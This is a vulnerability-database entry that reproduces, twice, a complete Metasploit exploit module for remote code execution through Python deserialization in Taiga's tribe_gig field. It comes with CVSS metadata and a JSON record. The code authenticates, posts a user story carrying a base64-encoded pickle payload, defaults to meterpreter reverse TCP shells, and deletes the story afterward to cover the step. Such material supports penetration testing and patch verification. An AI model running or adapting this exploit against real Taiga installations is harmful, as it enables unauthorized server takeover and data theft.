Taiga tribe_gig authenticated unserialize remote code execution_MSF:EXPLOIT-MULTI-HTTP-TAIGA_TRIBE_GIG_UNSERIAL-

9 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Description

This module exploits an unserialization flaw by creating a userstory in a project. Module Options msf use exploit/multi/http/taigatribegigunserial msf exploittaigatribegigunserial show targets ...targets... msf exploittaigatribegigunserial set TARGET...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-HTTP-TAIGA_TRIBE_GIG_UNSERIAL-

Published Jan 7, 2026 at 18:58

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class TaigaClientException < StandardError; end

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Taiga tribe_gig authenticated unserialize remote code execution',
'Description' => %q{
This module exploits an unserialization flaw by
creating a userstory in a project.
},
'License' => MSF_LICENSE,
'Author' => [
'rootjog', # Discovery
'whotwagner' # Metasploit Module
],
'References' => [
['URL', 'https://github.com/taigaio/taiga-back/security/advisories/GHSA-cpcf-9276-fwc5'],
['CVE', '2025-62368']
],
'Platform' => %w[linux unix python],
'Targets' => [
[
'Python payload',
{
'Arch' => [ ARCH_PYTHON ],
'Platform' => 'python',
'Type' => :python,
'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
}
],
[
'Linux Command', {
'Arch' => [ ARCH_CMD ],
'Platform' => %w[unix linux],
'Type' => :nix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
}
}
],
],
'DefaultOptions' => {
'SSL' => false
},
'Privileged' => false,
'DisclosureDate' => '2025-10-28',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'Path to taiga', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate as']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
]
)
end

def authenticate(user, pass)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api/v1/auth'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => {
username: user,
password: pass,
type: 'normal'
}.to_json,
'keep_cookies' => true
)

raise TaigaClientException, 'Login failed' if res&.code != 200

parsed_json = res.get_json_document
@token = parsed_json['auth_token']
@taiga_user_id = parsed_json['id']
end

def get_project
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api/v1/projects'),
'vars_get' => { 'member' => @taiga_user_id, 'order_by' => 'user_order' },
'method' => 'GET',
'ctype' => 'application/json',
'keep_cookies' => true
)

raise TaigaClientException, 'Get projects failed!' if res&.code != 200

projects = res.get_json_document
projects.each do |project|
@taiga_project = project['id'] if project['is_kanban_activated']
end

raise TaigaClientException, 'No project with activated kanban found' unless defined? @taiga_project
end

def get_status
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api/v1/userstories/filters_data'),
'vars_get' => { 'project' => @taiga_project },
'method' => 'GET',
'ctype' => 'application/json',
'keep_cookies' => true
)

raise TaigaClientException, 'Get status failed!' if res&.code != 200

status_data = res.get_json_document
raise TaigaClientException, 'No statuses found!' unless status_data.key? 'statuses'

status_data['statuses'].each do |stat|
return stat['id'] if stat['name'] == 'New'
end
end

def delete_userstory(id)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "api/v1/userstories/#{id}"),
'method' => 'DELETE',
'ctype' => 'application/json',
'headers' => { 'Authorization' => "Bearer #{@token}" },
'keep_cookies' => true
)
end

def send_payload(payload, project_status)
temp_project = Rex::Text.rand_text_alpha(10..15)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/api/v1/userstories'),
'method' => 'POST',
'ctype' => 'application/json',
'headers' => { 'Authorization' => "Bearer #{@token}" },
'data' => {
_attrs: { project: @taiga_project, subject: '', description: '', tags: [], points: {}, swimlane: nil, status: project_status, is_archived: false }, _name: 'userstories', _dataTypes: {}, _modifiedAttrs: { subject: temp_project.to_s, description: temp_project.to_s }, _isModified: true, project: @taiga_project, subject: temp_project.to_s, description: temp_project.to_s, tags: [], points: {}, swimlane: nil, status: project_status, is_archived: false, is_closed: false,
tribe_gig: payload.to_s
}.to_json
)
end

def check
cookie_jar.clear
begin
authenticate(datastore['USERNAME'], datastore['PASSWORD'])
get_project
project_status = get_status
rescue TaigaClientException => e
return Exploit::CheckCode::Unknown(e)
end
sleep_time = rand(5..10)
pl = Msf::Util::PythonDeserialization.payload(:py3_exec, "import os;os.system('sleep #{sleep_time}')")
command = Rex::Text.encode_base64(pl)
res, elapsed_time = Rex::Stopwatch.elapsed_time do
send_payload(command, project_status)
end
return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res&.code == 201

user_story_id = res.get_json_document['id']
res = delete_userstory(user_story_id)
print_warning('Cleanup failed') unless res&.code == 204

print_status("Elapsed time: #{elapsed_time} seconds.")
return Exploit::CheckCode::Vulnerable('Detected vulnerable Taiga.io') if sleep_time <= elapsed_time

Exploit::CheckCode::Safe('Target is not vulnerable')
end

def execute_command(cmd, _opts = {})
# calls some method to inject cmd to the vulnerable code.
begin
project_status = get_status
rescue TaigaClientException => e
fail_with(Failure::UnexpectedReply, e)
end
print_status('Sending payload..')
res = send_payload(cmd, project_status)
print_good('Payload sent')
user_story_id = res.get_json_document['id']
print_status('Cleanup..')
res = delete_userstory(user_story_id)
print_warning('Cleanup failed') unless res&.code == 204
print_good('Userstory deleted')
end

def exploit
cookie_jar.clear

begin
authenticate(datastore['USERNAME'], datastore['PASSWORD'])
get_project
rescue TaigaClientException => e
fail_with(Failure::UnexpectedReply, e)
end

if target['Type'] == :python
command = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)
else
command = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, "import os;os.system('#{payload.encoded}')")
end
data = Rex::Text.encode_base64(command)
execute_command(data)
end
end

{
    "lastseen": "2026-01-07T19:04:51",
    "description": "This module exploits an unserialization flaw by creating a userstory in a project. Module Options msf use exploit/multi/http/taigatribegigunserial msf exploittaigatribegigunserial show targets ...targets... msf exploittaigatribegigunserial set TARGET...",
    "published": "2026-01-07T18:58:55",
    "modified": "2026-01-07T18:58:55",
    "type": "metasploit",
    "title": "Taiga tribe_gig authenticated unserialize remote code execution",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-HTTP-TAIGA_TRIBE_GIG_UNSERIAL-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-62368"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass TaigaClientException < StandardError; end\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Taiga tribe_gig authenticated unserialize remote code execution',\n        'Description' => %q{\n          This module exploits an unserialization flaw by\n          creating a userstory in a project.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'rootjog',      # Discovery\n          'whotwagner'    # Metasploit Module\n        ],\n        'References' => [\n          ['URL', 'https://github.com/taigaio/taiga-back/security/advisories/GHSA-cpcf-9276-fwc5'],\n          ['CVE', '2025-62368']\n        ],\n        'Platform' => %w[linux unix python],\n        'Targets' => [\n          [\n            'Python payload',\n            {\n              'Arch' => [ ARCH_PYTHON ],\n              'Platform' => 'python',\n              'Type' => :python,\n              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }\n            }\n          ],\n          [\n            'Linux Command', {\n              'Arch' => [ ARCH_CMD ],\n              'Platform' => %w[unix linux],\n              'Type' => :nix_cmd,\n              'DefaultOptions' => {\n                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'\n              }\n            }\n          ],\n        ],\n        'DefaultOptions' => {\n          'SSL' => false\n        },\n        'Privileged' => false,\n        'DisclosureDate' => '2025-10-28',\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n        }\n      )\n    )\n\n    register_options(\n      [\n        OptString.new('TARGETURI', [true, 'Path to taiga', '/']),\n        OptString.new('USERNAME', [true, 'The username to authenticate as']),\n        OptString.new('PASSWORD', [true, 'The password to authenticate with'])\n      ]\n    )\n  end\n\n  def authenticate(user, pass)\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'api/v1/auth'),\n      'method' => 'POST',\n      'ctype' => 'application/json',\n      'data' => {\n        username: user,\n        password: pass,\n        type: 'normal'\n      }.to_json,\n      'keep_cookies' => true\n    )\n\n    raise TaigaClientException, 'Login failed' if res&.code != 200\n\n    parsed_json = res.get_json_document\n    @token = parsed_json['auth_token']\n    @taiga_user_id = parsed_json['id']\n  end\n\n  def get_project\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'api/v1/projects'),\n      'vars_get' => { 'member' => @taiga_user_id, 'order_by' => 'user_order' },\n      'method' => 'GET',\n      'ctype' => 'application/json',\n      'keep_cookies' => true\n    )\n\n    raise TaigaClientException, 'Get projects failed!' if res&.code != 200\n\n    projects = res.get_json_document\n    projects.each do |project|\n      @taiga_project = project['id'] if project['is_kanban_activated']\n    end\n\n    raise TaigaClientException, 'No project with activated kanban found' unless defined? @taiga_project\n  end\n\n  def get_status\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'api/v1/userstories/filters_data'),\n      'vars_get' => { 'project' => @taiga_project },\n      'method' => 'GET',\n      'ctype' => 'application/json',\n      'keep_cookies' => true\n    )\n\n    raise TaigaClientException, 'Get status failed!' if res&.code != 200\n\n    status_data = res.get_json_document\n    raise TaigaClientException, 'No statuses found!' unless status_data.key? 'statuses'\n\n    status_data['statuses'].each do |stat|\n      return stat['id'] if stat['name'] == 'New'\n    end\n  end\n\n  def delete_userstory(id)\n    send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, \"api/v1/userstories/#{id}\"),\n      'method' => 'DELETE',\n      'ctype' => 'application/json',\n      'headers' => { 'Authorization' => \"Bearer #{@token}\" },\n      'keep_cookies' => true\n    )\n  end\n\n  def send_payload(payload, project_status)\n    temp_project = Rex::Text.rand_text_alpha(10..15)\n    send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, '/api/v1/userstories'),\n      'method' => 'POST',\n      'ctype' => 'application/json',\n      'headers' => { 'Authorization' => \"Bearer #{@token}\" },\n      'data' => {\n        _attrs: { project: @taiga_project, subject: '', description: '', tags: [], points: {}, swimlane: nil, status: project_status, is_archived: false }, _name: 'userstories', _dataTypes: {}, _modifiedAttrs: { subject: temp_project.to_s, description: temp_project.to_s }, _isModified: true, project: @taiga_project, subject: temp_project.to_s, description: temp_project.to_s, tags: [], points: {}, swimlane: nil, status: project_status, is_archived: false, is_closed: false,\n        tribe_gig: payload.to_s\n      }.to_json\n    )\n  end\n\n  def check\n    cookie_jar.clear\n    begin\n      authenticate(datastore['USERNAME'], datastore['PASSWORD'])\n      get_project\n      project_status = get_status\n    rescue TaigaClientException => e\n      return Exploit::CheckCode::Unknown(e)\n    end\n    sleep_time = rand(5..10)\n    pl = Msf::Util::PythonDeserialization.payload(:py3_exec, \"import os;os.system('sleep #{sleep_time}')\")\n    command = Rex::Text.encode_base64(pl)\n    res, elapsed_time = Rex::Stopwatch.elapsed_time do\n      send_payload(command, project_status)\n    end\n    return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res&.code == 201\n\n    user_story_id = res.get_json_document['id']\n    res = delete_userstory(user_story_id)\n    print_warning('Cleanup failed') unless res&.code == 204\n\n    print_status(\"Elapsed time: #{elapsed_time} seconds.\")\n    return Exploit::CheckCode::Vulnerable('Detected vulnerable Taiga.io') if sleep_time <= elapsed_time\n\n    Exploit::CheckCode::Safe('Target is not vulnerable')\n  end\n\n  def execute_command(cmd, _opts = {})\n    # calls some method to inject cmd to the vulnerable code.\n    begin\n      project_status = get_status\n    rescue TaigaClientException => e\n      fail_with(Failure::UnexpectedReply, e)\n    end\n    print_status('Sending payload..')\n    res = send_payload(cmd, project_status)\n    print_good('Payload sent')\n    user_story_id = res.get_json_document['id']\n    print_status('Cleanup..')\n    res = delete_userstory(user_story_id)\n    print_warning('Cleanup failed') unless res&.code == 204\n    print_good('Userstory deleted')\n  end\n\n  def exploit\n    cookie_jar.clear\n\n    begin\n      authenticate(datastore['USERNAME'], datastore['PASSWORD'])\n      get_project\n    rescue TaigaClientException => e\n      fail_with(Failure::UnexpectedReply, e)\n    end\n\n    if target['Type'] == :python\n      command = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)\n    else\n      command = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, \"import os;os.system('#{payload.encoded}')\")\n    end\n    data = Rex::Text.encode_base64(command)\n    execute_command(data)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/taiga_tribe_gig_unserial.rb",
    "cvss": {
        "score": 9,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/http/taiga_tribe_gig_unserial/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply